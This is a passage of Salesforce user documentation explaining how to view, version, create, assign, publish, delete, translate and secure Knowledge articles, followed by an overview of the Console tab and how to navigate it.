Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Read” on the article typeTo view published articles in the Articles tab or Articles related
list:

“Manage Articles”

AND

“Read” on the article type

To view draft, published, or archived articles in the Article
Management tab:

“Edit” on the article typeTo edit articles:

Viewing and Editing an Article from the Articles Tab

To view a published article, click on its title in the Articles tab. The article's format and content depend on the article type
chosen by your administrator, but all articles provide an expandable Properties header that contains the following information:

• Article Audience—The article's data categories. This field is only visible if you've defined data categories.
• Article Number—A unique number automatically assigned to the article.
• Channels—The channels the article appears in. Channels include:

◊ Your internal app
◊ Your partner portals
◊ Your Customer Portals
◊ Your public knowledge base

• First Published—Date and time the article was published originally.
• Last Modified—Date and time of the last major or minor update to the article.
• Last Published—Date and time of the last major update to the article. An author indicates a major update by flagging the

article as new when it is republished.
• Summary—Short description of the article.
• Validation Status—Shows whether the article has been validated or not.

When enabled on the Knowledge Settings page, users can edit the current version of an article by clicking Edit and modifying
it on the article edit page.
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The header also provides the ability to rate the article on a scale of one to five stars and view the article's average rating. Averages
aren't static. Every 15 days, if an article hasn't received a new vote its average rating moves up or down according to a half-life
calculation. This change ensures that over time, older or outdated articles don't maintain artificially high or low ratings
compared to newer, more frequently used articles. Articles without recent votes trend towards an average rating of three stars.
You can rate each article only once.

If your organization uses Chatter, you can display a Chatter feed of updates, comments, and posts about the article.

Viewing an Article from the Article Management Tab

On the list view page for draft, published, or archived articles:

• Click the article's title to view a read-only version of the article detail page. Click Edit to update the article.
• Click Preview to see how the article appears for end users. From the Channel drop-down menu you can choose any channel

where the article is visible except the public knowledge base.

Note:  Voting and Chatter information is not available when previewing a Knowledge article.

See Also:
Salesforce Knowledge Overview
Salesforce Knowledge Terminology
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Salesforce Knowledge Article Versions

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Manage Articles”

AND

“Create,” “Read,” “Edit,” or “Delete” on the article type

To create, edit, or delete articles:

“Manage Articles”

AND

“Create,” “Read,” “Edit,” and “Delete” on the article type

To publish or archive articles:

“Manage Articles”

AND

“Create,” “Read,” and “Edit” on the article type

To submit articles for translation:

Permissions vary depending on the approval process settingsTo submit articles for approval:

Article versions allows you to save an older version of a published article and then see which version of the article is associated
with a case. To save the previous version, select the Flag as new version checkbox when publishing a new version. The
previously published version is saved and the new version is published with the next sequential version number as an identifier.

When an article is attached to a case and a new version of the article is published, the system identifies the version attached
to the case as being outdated. For example, if Version 2 is attached to a case and a third version is published, the article attached
to the case becomes Version 2 (outdated). This notation ensures that there is a permanent record of which content was
associated with the case.

When you click the version number in the Article View, and the Article or Translation Detail pages, you’ll see the Version
History list. In this list you can:

• View the list of archived versions.

• Click a version’s title to view that version of the article.

• Expand the version to view its field change history (if you have history tracking enabled for the article type and for fields).

By default, the system stores up to ten versions of an article, plus any versions that are attached to cases.

When several versions of an article exist, you can restore an older version and republish it. Click Revert to Draft Version
to copy the archived version’s content into a draft article, then republish it as a new version. You can also restore the older
version of any associated translations at the same time.

Note: When there is an existing draft for the article, the option to revert isn’t available.
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You can delete an older, outdated version of an article by selecting Delete This Version from the article detail page.
Salesforce warns you when the version is associated with a case. If you still want to delete the article, it will no longer be
attached to the case. Translated article versions are dependent on the master language article. If the master language version
is deleted, the translated versions are also deleted.

Versions also appear in custom reports, allowing you to find and read the article version attached to a case.

See Also:
Managing Articles and Translations

Creating and Editing Articles
Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Manage Articles”

AND

“Create” and “Read” on the article type

To create articles:

“Manage Articles”

AND

“Read” and “Edit” on the article type

To edit draft articles:

“Manage Articles”

AND

“Create,” “Read,” and “Edit” on the article type

To edit published or archived articles:

Creating Articles

To create an article:

1. On the Article Management tab or from the Articles related list within a case, click New.
2. If your knowledge base supports multiple languages, choose the language you're using.
3. Choose an article type, enter the article title, and click OK.
4. Edit the article's fields, and select a validation status. If your article contains a rich text area field you can add some formatting

such as bulleted lists, links, and images.
5. In the Categories area, choose the categories to associate with your article:

• Click Edit next to a category group to open the category selection dialog box.
• In the Available Categories list expand the category hierarchy to select a category.
• Click Add to move a selected category to the Selected Categories list—you can have up to 8 data categories from

a data category group assigned to an article.
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Note:  You cannot add both a category and its child categories to the Selected Categories list. When
you add a category to an article:

◊ Child categories in the Available Categories list are unavailable unless you remove the parent from
the Selected Categories list.

◊ Child categories in the Selected Categories list disappear from that list.

Users searching for articles can find them by selecting an exact category or by selecting a parent or child
category.

• Click OK.

6. In the Channels area, select where your article will be available once published:

• Internal App: Salesforce users can access articles in the Articles tab depending on their role visibility.
• Customer: Customers can access articles if the Articles tab is available in the portal. Customer Portal users inherit the

role visibility of the manager on the account.
• Partner: Partners can access articles if the Articles tab is available in the portal. Partner portal users inherit the role

visibility of the manager on the account.
• Public Knowledge Base: Articles can be made available to anonymous users by creating a public knowledge base using

the Sample Public Knowledge Base for Salesforce Knowledge app from the AppExchange. Creating a public knowledge
base requires Sites and Visualforce.

• Your own website. Articles can be made available to users through your company website.

7. Click Quick Save to save your changes and remain on this page. Alternatively, click Save to save your changes, close the
article, and go to the Article Management tab.

8. Optionally:

• Create an assignment for a user to edit or review the article.
• Publish the article.
• Submit the article for approval. If you have the “Publish Articles” article action and an approval process is set up for an

article, you'll see both Publish... and Submit for Approval buttons.

Editing Articles and Translations

In addition to user permissions on the article type, you also need the “Edit Published and Archived Articles” article action to
edit articles or translations.

To edit an article:

1. Click Edit on the Article Management tab, or click Edit on an article or translation detail page.
2. If it is a published article or translation, choose whether to leave it published while you work on a draft copy, or whether

to remove the original article from publication and work on it directly. If you work on a copy, publishing the copy replaces
the last published version of the article. If you work on the original article, it is unavailable in the channels until you
republish it.

3. Edit the article's fields, and select a validation status. If your article contains a rich text area field you can add some formatting
such as bulleted lists, links, and images.

4. In the Categories area, choose the categories to associate with your article:

• Click Edit next to a category group to open the category selection dialog box.
• In the Available Categories list expand the category hierarchy to select a category.
• Click Add to move a selected category to the Selected Categories list—you can have up to 8 data categories from

a data category group assigned to an article.
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Note:  You cannot add both a category and its child categories to the Selected Categories list. When
you add a category to an article:

◊ Child categories in the Available Categories list are unavailable unless you remove the parent from
the Selected Categories list.

◊ Child categories in the Selected Categories list disappear from that list.

Users searching for articles can find them by selecting an exact category or by selecting a parent or child
category.

• Click OK.

5. In the Channels area, select where your article will be available once published:

• Internal App: Salesforce users can access articles in the Articles tab depending on their role visibility.
• Customer: Customers can access articles if the Articles tab is available in the portal. Customer Portal users inherit the

role visibility of the manager on the account.
• Partner: Partners can access articles if the Articles tab is available in the portal. Partner portal users inherit the role

visibility of the manager on the account.
• Public Knowledge Base: Articles can be made available to anonymous users by creating a public knowledge base using

the Sample Public Knowledge Base for Salesforce Knowledge app from the AppExchange. Creating a public knowledge
base requires Sites and Visualforce.

• Your own website. Articles can be made available to users through your company website.

6. Click Quick Save to save your changes and remain on this page. Alternatively, click Save to save your changes, close the
article, and go to the Article Management tab.

7. Optionally:

• Create an assignment for a user to edit or review the article.
• Publish the article.

Implementation Tips

• When applying categories, choose the categories that a user would naturally look for as they navigate. Users only find an
article if they select its explicitly applied category, the parent of that category, or a child of that category.

• Multiple users can edit the same article at the same time. If that occurs, your changes may be overwritten by a colleague
without warning, even if you save your work frequently. To avoid accidental data loss, instruct all users who edit articles
to only edit the articles they're assigned.

Best Practices

• Assign articles to the users who should work on them next. Enter assignment instructions that are direct, brief, and clear.
Specify a due date to set expectations of when the assignment needs to be completed. If your knowledge base team
consistently uses assignments in this manner, you can easily track the progress of your organization's draft articles by looking
at the draft articles views on the Article Management tab.
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• Make sure to assign yourself the articles you want to work on.

See Also:
Salesforce Knowledge Overview
Salesforce Knowledge Terminology
Assigning Draft Articles
Publishing Articles and Translations

Assigning Draft Articles
Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Manage Articles”

AND

“Create” and “Read” on the article type

To create draft articles:

“Manage Articles”

AND

“Read” and “Edit” on the article type

To assign draft articles:

Working on draft articles is often a team effort: different members of the editorial staff create drafts, review the text and
formatting, add graphics, and so on. With Salesforce Knowledge, you assign draft articles to collaborators once you're finished
with your task.

For example, say you create an article and assign it to yourself with the instruction “Write content before the 10th” (as described
in step 1 in Figure 8: Example draft article assignment). On the 10th, your article is complete but you need help from a visual
designer. You assign your article to your visual designer with the instruction “Finalize the visual design before the 20th" (step
2). When the visual designer opens the Article Management tab, he or she sees the new assignment by selecting Draft
Articles Assigned to Me. When the visual design is finished, the designer reassigns the article back to you for a final check.
The article now displays with a new instruction: “Please review the article before publishing” (step 3). Finally, you review the
article and decide to schedule its publication on the 31st.
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Figure 8: Example draft article assignment

An assignment is a draft article that has been assigned to another user for editing. Assignments may contain brief instructions
and a due date. When you create an article, a new assignment is automatically attached to it. You can edit the assignment,
enter the instructions, choose an assignee, and specify a due date. Articles can only have one assignment at a given time. Note
that all users with sufficient permissions can edit an article, even if they're not the assignee.

To display your assignments on the Manage Articles tab:

1. Click the Articles tab in the view area.
2. Select Draft Articles.
3. Filter articles by those assigned to Me. You can see a list of all draft articles for your organization by filtering by those

assigned to Anyone.

To assign or reassign an article:

1. In a Draft Articles list, select the checkbox next to an article and click Assign.... Alternatively, click Assign... from
the article detail page or the article edit page.

2. Choose a user.
3. Enter instructions for the assignment.
4. Choose a due date.
5. Check Send Email to send an email to the selected users with instructions included.

Note:  When you select multiple articles, every assigned user receives one email for every 10 articles assigned.
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6. Click OK.

Best Practices

• If your editorial process involves several draft stages and collaborative tasks, use assignments to manage these steps.
• Multiple users can edit the same article at the same time. If that occurs, your changes may be overwritten by a colleague

without warning, even if you save your work frequently. To avoid accidental data loss, instruct all users who edit articles
to only edit the articles they're assigned.

• Make sure to assign yourself the articles you want to work on.

See Also:
Salesforce Knowledge Terminology
Publishing Articles and Translations
Creating and Editing Articles

Publishing Articles and Translations
Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Manage Articles”

AND

“Create,” “Read,” “Edit,” and “Delete” on the article type

To publish articles:

“Manage Articles”

AND

“Create,” “Read,” “Edit,” and “Delete” on the article type

To publish translated articles:

Publishing articles and translations makes them visible in all channels selected. If you publish an article that has translations,
all versions of the article are published.

In addition to permissions on an article's article type, you also need the “Publish Articles” or “Publish Translated Articles”
article action to publish an article or translation. Alternatively, if your organization has implemented approval processes, you'll
be able to publish an article after it has been approved. Note that approval processes aren't available for translations.

1. On the Article Management tab, filter the articles in the view area, select an article or articles, and click Publish....
Alternatively, click Publish... on either the detail page or edit page of an article.

2. Select Publish article(s) now or Schedule publication on to choose the date to publish the article.
3. If the article has previously been published, select the Flag as new version checkbox to make the new article icon

( ) display next to your article in the selected channels. Users from these channels can see that this article has been modified
since the last time they’ve read it. This checkbox is not available when you publish an article for the first time, as the icon
displays by default for new articles.
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If the draft being published is a working copy of a currently published article, it is published as a new version of the original.

4. Click OK.

Articles you scheduled for publication at a later date continue to appear in the Draft Articles filter, now with the pending icon
( ) next to the article title. Hover over the icon to see the publication date.

Note:

• If you assign an article that is scheduled for publication, you also cancel the scheduled publication.

• Scheduling a publication removes any assignment information. The user who scheduled the publication is assigned
to the article.

• Conflicts may occur when different users perform actions on the same articles simultaneously. Depending on who
performs the action first, the articles will not be available for subsequent users though the articles still display
momentarily in the articles list. Performing an action on these articles results in a conflict error message.

• If you have the “Publish Articles” article action and an approval process is set up for an article, you'll see both
Publish... and Submit for Approval buttons.

Tip:  To cancel a scheduled publication, click Cancel Publication on the article or translation detail or edit page.

See Also:
Salesforce Knowledge Terminology
Assigning Draft Articles
Viewing Articles
Creating and Editing Articles

Deleting Articles and Translations
Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Manage Articles”

AND

”Read,” “Edit,” and “Delete” on the article type

To delete a draft, published, or archived article

Deleting an article or translation permanently removes it from the knowledge base. You can delete draft articles, draft translations
of articles, or archived articles. To delete a published article, first remove it from publication by choosing to edit or archive it.

To delete articles and translations:

1. On the Article Management tab, click the Articles tab in the View area.
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2. Select Draft Articles or Archived Articles, select the article you want to delete, and click Delete. Alternatively, click Delete
on the detail page of a draft or archived article or draft translation.

3. Click OK.

Deleting articles moves them to the Recycle Bin, where you can undelete them if you change your mind. If you delete an
article with translations, the translations are also moved to the Recycle Bin. However, if you delete a single translation, you
can't undelete it. Deleting an article or translation may fail if another user or the system simultaneously modifies it while the
deletion is being processed. You'll receive an error message if this occurs.

Note:

• Conflicts may occur when different users perform actions on the same articles simultaneously. Depending on who
performs the action first, the articles will not be available for subsequent users though the articles still display
momentarily in the articles list. Performing an action on these articles results in a conflict error message.

• If you delete a draft article that is a working copy of a currently published article, the original published version
is not affected but the draft version is permanently removed. It does not go to the Recycle Bin. You can edit the
published version to work again on a draft copy.

See Also:
Salesforce Knowledge Terminology
Archiving Articles and Translations
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Managing Articles and Translations
Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Manage Articles”

AND

“Create,” “Read,” “Edit,” or “Delete” on the article type

To create, edit, or delete articles:

“Manage Articles”

AND

“Create,” “Read,” “Edit,” and “Delete” on the article type

To publish or archive articles:

“Manage Articles”

AND

“Create,” “Read,” and “Edit” on the article type

To submit articles for translation:

Permissions vary depending on the approval process settingsTo submit articles for approval:

The Article Management tab is your home page for working with articles throughout the publishing cycle as they are created,
assigned to collaborators, translated, published, and archived. In addition to having the correct permissions on an article's
article type, you also need article actions to complete some tasks.

Lets YouArticle Action

Publish articles.Publish Articles

Publish translated articles.Publish Translated Articles

Submit articles for translation.Submit Articles for Translation

Archive articles, including translated articles.Archive Articles

The Article Management tab defaults to the Articles view.

Article Publishing Cycle

Articles move through a publishing cycle, which is depicted in the graphic below:

1. Create and save a new article.
2. Reassign the article to an editor, translator, reviewer, or any other collaborator as needed. That person can reassign the

article as many times as necessary until the content is ready for publication. If an approval process is set up for the article
type, you or the person you reassign to submits the article for approval. The article is routed to the appropriate approver
or set of approvers, who either approve or reject it.
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3. Publish the completed draft to one or more channels, depending on the audiences you've configured: the Articles tab in
your Salesforce organization, a customer portal, a partner portal, or a public knowledge base. You can schedule the article
to be published on a future date.

4. Update the article as needed. When modifying a published article, you can either remove it from publication so that the
original is no longer visible to users, or leave the original published and work on a copy until you're ready to replace the
original with your update.

5. Archive the article when it is obsolete to remove it from publication. As with publishing an article, you can archive
immediately or on a future date.

6. Delete the article as needed, or turn it into a draft and begin a new publishing cycle.

Figure 9: Article Publishing Cycle

Choosing Articles to View

To specify which articles appear in the list view, use the following options in the sidebar:

• In the View area, select Draft Articles, Published Articles, or Archived Articles. You can filter draft articles by those
assigned to you or those assigned to anyone (all draft articles for your organization).

• If applicable, click the Translations tab in the View area, and select Draft Translations or Published Translations. You can
filter draft translations by those assigned to you, those assigned to a translation queue, or those assigned to anyone (all
draft translations in your organization).

• To refine the current view, you must first select an article language filter and then enter a keyword or phrase in the Find
in View field. The Find in View field is inactivated for archived articles.
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• In the Filter area, choose a category from a drop-down menu to filter the current view.

Choosing Columns

To modify which columns display, click Columns. The following columns are available depending on what is selected in the
view area:

ViewDescriptionColumn

All articles and translationsDisplays the actions available for the
article or translation.

Action

Published and archived articles and
published translations

Average ratings from users of your
internal Salesforce organization,
Customer Portal, partner portal, and your
public knowledge base.

All User Ratings

Archived articlesDate the article was archived.Archived Date

All articles and translationsUnique number automatically assigned
to the article.

Article Number

All articlesClick to view the article.Article Title

Draft articles and translationsThe user who is assigned work on the
article.

Assigned to

Draft articles and translationsInstructions for the assignment.Assignment Details

Draft articles and translationsDate to complete work on the article. If
the date has passed, it displays in red.

Assignment Due Date

Draft articles and translationsDate the article was written.Created Date

Published and archived articles and
published translations

Average ratings from users on the
Customer Portal and the public
knowledge base.

Customer Ratings

Draft and published translationsThe language an article is translated into.Language

Draft and published translationsThe date and type of the last action taken
on a translation.

Last Action

Draft articles and translationsLast person to update the article.Last Modified by

All articles and translationsLast date the article was edited.Last Modified Date

Published and archived articles and
published translations

Average views from users of your internal
Salesforce organization, Customer Portal,
partner portal, and your public
knowledge base.

Most Viewed by all Users

Published and archived articles and
published translations

Average views from users on the
Customer Portal and the public
knowledge base.

Most Viewed by Customers

Published and archived articles and
published translations

Average views from users on the partner
portal and the public knowledge base.

Most Viewed by Partners

Published and archived articles and
published translations

Average ratings from users of your
partner portal and public knowledge base.

Partner Ratings
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ViewDescriptionColumn

Published articles and translationsDate the article was published.Published Date

Draft and published translationsThe original article before translation.
Click on the article title to view the
article.

Source Article

Draft and published translationsThe title of the translated article. Click
on the translation title to edit the
translation.

Translated Article

Articles submitted for translationStatus in the translation cycle. Hover over
the icon(s) to view the status for each

Translation Status

translation. If a translation has been
published, there are separate tabs for
draft and published translations.

All articlesThe article's type, such as FAQ or
Product Description, that determines
what information the article contains.

Type

All articles and translations, when
enabled

Shows whether the content of the article
has been validated.

Validation Status

All articlesThe article’s version. Hover over the
version number to view details about
other versions of the article.

Version

Article and Translation Management Tasks

To create and manage articles and translations:

• Enter a search term or use the category drop-down menu to find an article or translation.
• Click New to create a new article.
• Select an article or translation and click Publish... to make it visible in the selected channels. If you have the “Publish

Articles” article action and an approval process is set up for an article, you'll see both Publish... and Submit for Approval
buttons.

• Click Edit next to an article or translation to modify its content or properties.
• Click Preview next to an article or translation to see how it will appear for end users. From the Channel drop-down menu

you can choose any channel where an article is visible except the public knowledge base.

Note:  Voting and Chatter information is not available when previewing a Knowledge article.

• Click the version number of the article or translation to see a list of its other versions.
• Select an article or translation and click Assign... to change the owner of an article or translation.
• Select an article or translation and click Delete to send an article or translation to the Recycle Bin.
• Select an article and click Archive... to archive a published article.
• If multiple languages for Salesforce Knowledge is set up, select an article or articles and click Submit for Translation.

Submitting Articles for Translation

If your knowledge base supports multiple languages, the Submit for Translation option is available.

1880

Managing Articles and TranslationsAccessing Knowledge



To submit articles for translation from the Article Management tab:

1. Select an article or articles and click Submit for Translation.
2. Optionally, select a due date for one translation or all translations. You can set dues dates for each language.

Due dates appear on the Translations list view. They display in red if the date is passed.

3. Select from the languages supported by your knowledge base.
4. Optionally, change the assignee. You can assign the article to another knowledge base user for translation, or assign the

article to a queue for export to a translation vendor.
5. If you want email notifications sent to the assignees, check Send notification email.
6. Click Save.

Once translations are submitted, users with the “Manage Articles” permission can manage them on the Article Management
tab. To view submitted translations, select Translations in the View area. You can edit, preview, publish, assign, and delete
translations.

Tip:  The related links area of the Article Management tab takes you directly to the setup pages for exporting articles
for translation (Data Management > Export Articles for Translation) and importing translations (Data Management
> Import Article Translations).

See Also:
Salesforce Knowledge Terminology
Publishing Articles and Translations
Creating and Editing Articles
Searching for Articles
Viewing Articles

The Articles Tab
This document is a starting point for what you can do on the Articles tab.

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Read” on the article typeTo view articles:

“Manage Articles”

AND
“Read” and “Create” on the article type

To create articles:

The Articles tab presents a list of your Salesforce Knowledge published articles. On the Articles tab, you can:

• Search for published articles

• View published articles

• Create an article
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• Customize the article information displayed

See Also:
Salesforce Knowledge Overview
Creating and Editing Articles
Searching for Articles
Viewing Articles

Customizing the Article Tab
Select the article information displayed and sort the articles on that information.

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Read” on the article typeTo view articles:

The Article tab default list view contains articles that were created or updated during the last 30 days. To choose what article
information is displayed and sort articles by that information:

1. Click the Columns drop-down.
2. Click the article information you want to display.

New columns are placed at the far right of the article list. Available columns include:

DescriptionColumn

The average rating given to the article by knowledge agents using the internal app.Agent Ratings

The average rating cast by knowledge agents, partners, and customers. Visitors to the public
knowledge base cannot rate articles. For details about user ratings, see Viewing Articles on
page 1866.

All User Ratings

Unique number automatically assigned to the article. Numbering for articles starts at
“000001000.” You can't change the format and numbering for this field.

Article Number

The article’s title. This column can’t be removed.Article Title

The average rating that customers have given the article. This option only displays if your
organization exposes articles via the Customer Portal.

Customer Ratings

Comparative indicator calculated by adding knowledge agent views.Most Viewed by Agents

Comparative indicator calculated by adding views from all relevant channels: knowledge agents
(internal users), Customer Portal users, partner portal users, and visitors to the public knowledge
base.

Most Viewed by all Users
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DescriptionColumn

Comparative indicator calculated by adding Customer Portal user views.Most Viewed by
Customers

Comparative indicator calculated by adding partner portal views.Most Viewed by Partners

Comparative indicator calculated by adding public-knowledge-base visitor views.Most Viewed by Visitors

Flag that indicates whether you have viewed an article.New

The average rating that partners have given the article. This option only displays if your
organization exposes articles via the partner portal.

Partner Ratings

Date the article was published.Published Date

Article type assigned to the article. Article types determine the content and format of each
article.

Type

Shows whether the content of the article has been validated.Validation Status

Note:  You can only select one information column at a time.

3. Drag the column headers in the order you want them displayed.
4. Click a column header to sort the list according to that column's value.

You can sort by any column except Type.

5. Click the arrow at the bottom of the page to change the number of articles that display on the page at one time.

See Also:
The Articles Tab
Salesforce Knowledge Overview
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Translating Articles within Salesforce Knowledge
Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Manage Articles”

AND

“Create,” “Read,” “Edit,” or “Delete” on the article type
(depending on the action)

To work with translated articles:

Depending on the status of your translation and the article actions assigned to you, you can do the following from the translation
detail page.

Article StatusDescriptionAction

To archive a translation, archive its
master article.

Archiving removes published translations
that are obsolete so they no longer display
to agents and customers on your

Archive

organization's Salesforce Knowledge
channels.

Draft translationsAssigning changes the owner of the
translation.

Assign...

Draft translationsDeleting a translation permanently
removes it from the knowledge base.

Delete

Note:  You can't undelete a
draft translation.

Draft and published translationsEditing modifies the translation's content
or properties.

Edit

Draft and published translationsPreviewing shows how the translation
appears to end users.

Preview

Note:  Voting and Chatter
information is not available
when previewing a Knowledge
article.

Draft translationsPublishing translations makes them
visible in all channels selected.

Publish...
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To translate an article within Salesforce:

1. Click the Article Management tab and select Translations in the View area.
2. Select Draft Translations.
3. Optionally, change the Assigned To filter to view articles that are not assigned to you for translation. For example, you

may want to view articles assigned to a translation queue.
4. Click Edit next to the article and language you want to translate.
5. Enter your translation.
6. Click Save.

Note:  You can also edit a published translation. It reverts to draft status until you republish it, although you can
choose to keep the existing version published while you update it.

Tracking Article History
Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Customize Application”

AND
“Manage Salesforce Knowledge”

To create, edit, or delete article types:

You can track the history of certain fields in articles. Modifying any of these fields adds a new entry to the History related list.
All entries include the date, time, nature of the change, and who made the change. Note that not all field types are available
for history tracking. Certain changes, such as case escalations, are always tracked. You can also set tracking for the article type
and track the full history of an article and its versions. Article events are tracked for up to 18 months.

The system records and displays field updates, publishing workflow events, and language versions for the master article and
any translations. When you track old and new values, the system records both values as well as the date, time, nature of the
change, and the user who made the change. When you track only the changed values, the system marks the changed field as
having been edited; it doesn’t record the old and new field values. This information is available in the Version History list and
the fields are available in the Article Version History report.

Article history respects field, entity, and record-level security. You must have at least “Read” permission on the article type or
the field to access its history. For data category security, Salesforce determines access based on the categorization of the online
version of an article. If there is no online version, then security is applied based on the archived version, followed by the security
of the draft version.

1. From Setup, click Customize > Knowledge.
2. Click Article Types.
3. Create an article type or edit one from the Article Types list.
4. Click Set History Tracking.
5. Choose the fields you want to track.

Salesforce begins tracking history from that date and time. Changes made before that date and time are not tracked.
6. Click Save.
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Setting an Article's Field-Level Security
Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Customize Application”

AND

“Manage Salesforce Knowledge”

To set field-level security:

Field-level security lets administrators restrict users’ access to specific fields on detail and edit pages. For example, you can
make a “Comment” field in an article visible for Internal App profiles but not for Customer Portal profiles.

If using both article-type layout and field-level security to define field visibility, the most restrictive field access setting always
applies. For example, if a field is hidden in the article-type layout, but visible in the field-level security settings, the layout
overrides security settings and the field won't be visible. Some user permissions override both page layouts and field-level
security settings. For example, users with the “Edit Read Only Fields” permission can always edit read-only fields regardless
of any other settings.

Important: Field-level security doesn’t prevent searching on the values in a field. When search terms match on field
values protected by field-level security, the associated records are returned in the search results without the protected
fields and their values.

To define field-level security:

1. Define security via a permission set, profile, or field.

• For permission sets or profiles:

a. From Setup, click Manage Users, then click Permission Sets or Profiles.
b. Select a permission set or profile.
c. Depending on which interface you're using, do one of the following:

◊ Permission sets or enhanced profile user interface—In the Find Settings... box, enter the name of the object
you want and select it from the list. Click Edit, then scroll to the Field Permissions section.

◊ Original profile user interface—In the Field-Level Security section, click View next to the object you want to
modify, and then click Edit.

• For fields:

a. From Setup, click Customize > Knowledge > Article Types.
b. Select the article type that contains the field to modify.
c. Select the field and click Set Field-Level Security.

2. Specify the field's access level.
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Note:  These field access settings override any less-restrictive field access settings on the article-type layouts.

3. Click Save.

After setting field-level security, you can modify the article-type layouts to organize the fields on detail and edit pages.

USING UNIFIED HELP DESKS

CONSOLE TAB

Console Tab Overview
Available in: Professional, Enterprise, Unlimited, and Developer Editions

The console is a tab that combines a list view and related records into one screen with different frames so that users have all
the information they need when interacting with Salesforce. By using the console, users can quickly find, view, and edit records,
such as cases, accounts, and contacts, with fewer clicks and without switching back and forth between screens. Administrators
choose the information displayed in the console to accommodate your varied and evolving business needs.

Before setting up or using the console, review console terminology.

Note:  The Service Cloud console is different from the Console tab. It improves on the Console tab by displaying
records and related items as tabs on one screen. See Service Cloud Console Overview on page 1892.

See Also:
Console FAQ
Displaying the Console Tab
Navigating within the Console Tab
Tip sheet: Using the Console

Console Concepts
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Review the following terminology used to describe the components of the Console tab:
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Frames

Separate sections of the console, each displaying a different record, list view, or other page.

List View

The console's top frame, which is a list view of records based on specific criteria. The list views you can select to display
in the Console tab are the same list views defined on the tabs of other objects. You cannot create a list view within the
console.

Detail View

The Console tab's center frame, which is the detail page view of any record selected from any of the console’s other
frames. The detail view displays the same page layouts defined for the object’s detail pages. When a record is displayed
in the detail view, it is highlighted in the list view.

Mini View

The Console tab's right frame which displays the records associated with the record displayed in the detail view. The
fields displayed in the mini view are defined in the mini page layouts by an administrator. The mini view does not display
if the record in the detail view does not have any records associated with it.

Sidebar

The console's left frame, which displays recent items, the Recycle Bin, and other components, just like the sidebar
displayed on every Salesforce page. To show or hide the sidebar in the console, click the border of the left frame.

Related Objects

Objects chosen by an administrator to display in the Console tab's mini view when records of a particular type are shown
in the console's detail view. For example, when a case is in the detail view, an administrator can choose to display an
associated account, contact, or asset in the mini view.

Mini Page Layouts

A subset of the items in a record's existing page layout that administrators choose to display in the Console tab's Mini
View and in Hover Details. Mini page layouts inherit record type and profile associations, related lists, fields, and field
access settings from the page layout.

Console Layout

Objects chosen by an administrator to display in the list view frame of the Console tab. For example, if an administrator
adds cases to a console layout, then users whose profiles are assigned to that console layout can see list views of cases in
the console's list view frame.

See Also:
Console Tab Overview
Displaying the Console Tab
Navigating within the Console Tab
Tip sheet: Using the Console
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Navigating within the Console Tab
Available in: Professional, Enterprise, Unlimited, and Developer Editions

What you click in the Console tab determines the frame a record displays in.

In the detail view, clicking:

• Buttons or links on the record displays the record in the detail view.

• Email this page ( ) displays a link to the record in an email.
• Link to this page ( ) displays the record and the URL of the record in a new browser window.
• Printable View ( ) displays a printable view of the record in a popup window.
• Customize Page ( ) allows you to customize the display of related lists in the detail view of the record.
• Help for this page ( ) displays an online help page for the record.

In the mini view, clicking:

• Links displays the record in the detail view. Associated records display in the mini view.

• View displays the entire record in the detail view.

• Edit displays a mini edit page in the mini view.

To edit a field not displayed on the mini edit page, click View to display the entire record in the detail view, and
then click Edit from the detail view.

• Show more below a related list displays more of the records included in the related list in the mini view. Show more
displays an additional five records every time you click it, up to a maximum of 100.

Note: The mini view does not display if the record in the detail view does not have any records associated
with it.

In the list view, clicking:

• A link displays the record in the detail view.

• Refresh reloads the list view with any updates that have occurred to the records since you began viewing the list.

• A column heading sorts that column in ascending order. Click the heading a second time to sort in descending order.

• A letter at the bottom of the list view filters your list view records by the letter.

• fewer or more at the bottom of the list view displays a shorter or longer list.

• Previous Page or Next Page at the bottom of the list view displays the previous or next page of items on the list.

• For more information, see Using the Console List View on page 1891.

In the sidebar, clicking:

• The border of the left frame opens the sidebar in the console. Click the border of the left frame a second time to
hide the sidebar.

• A record under Recent Items displays the record in the detail view.
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• Calendar displays the calendar in the detail view.

• Recycle Bin displays the Recycle Bin in the detail view.

Tip:  Clicking the back or forward buttons on your browser cycles you through pages in the console. You will not
immediately exit the console by clicking them.

Note:  Not all pages open within the console. For example, clicking Printable View, Check Spelling, Help for this
Page, lookup icons, email addresses, and custom links set to open in a new browser window all open outside of the
console in a new browser window or popup.

Drag-and-drop editing is not available for calendar views in the Console tab.

See Also:
Console FAQ
Console Tab Overview
Console Concepts
Displaying the Console Tab
Using the Console List View
Tip sheet: Using the Console

Displaying the Console Tab
Available in: Professional, Enterprise, Unlimited, and Developer Editions

You can start using the Console tab after your administrator has set it up as described in Setting Up the Console Tab on page
2133.

To display the console, click the Console tab. To exit the console, select any tab.

No data displays in the console if the selected list view does not contain any records.

Note: You can only access the Console tab if your administrator has assigned your user profile to a console layout
and granted you access to the Console tab. You can customize your display to make the Console tab visible in your
tab sets.

See Also:
Console FAQ
Console Tab Overview
Navigating within the Console Tab
Tip sheet: Using the Console
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Using the Console List View
Available in: Professional, Enterprise, Unlimited, and Developer Editions

The Console tab’s list view allows you to quickly perform actions within Salesforce without leaving the console.

Display list views

From the drop-down list in the top left of the list view frame, select an object, and then a list view of the object to display
in the console’s list view frame. You cannot create a list view within the console.

Click Refresh to reload the list view with any updates that have occurred to the records since you began viewing the list.
The refresh button automatically changes colors when record updates have occurred.

Records italicize in the list view when you edit them in the detail view. This shows you the records you have edited.

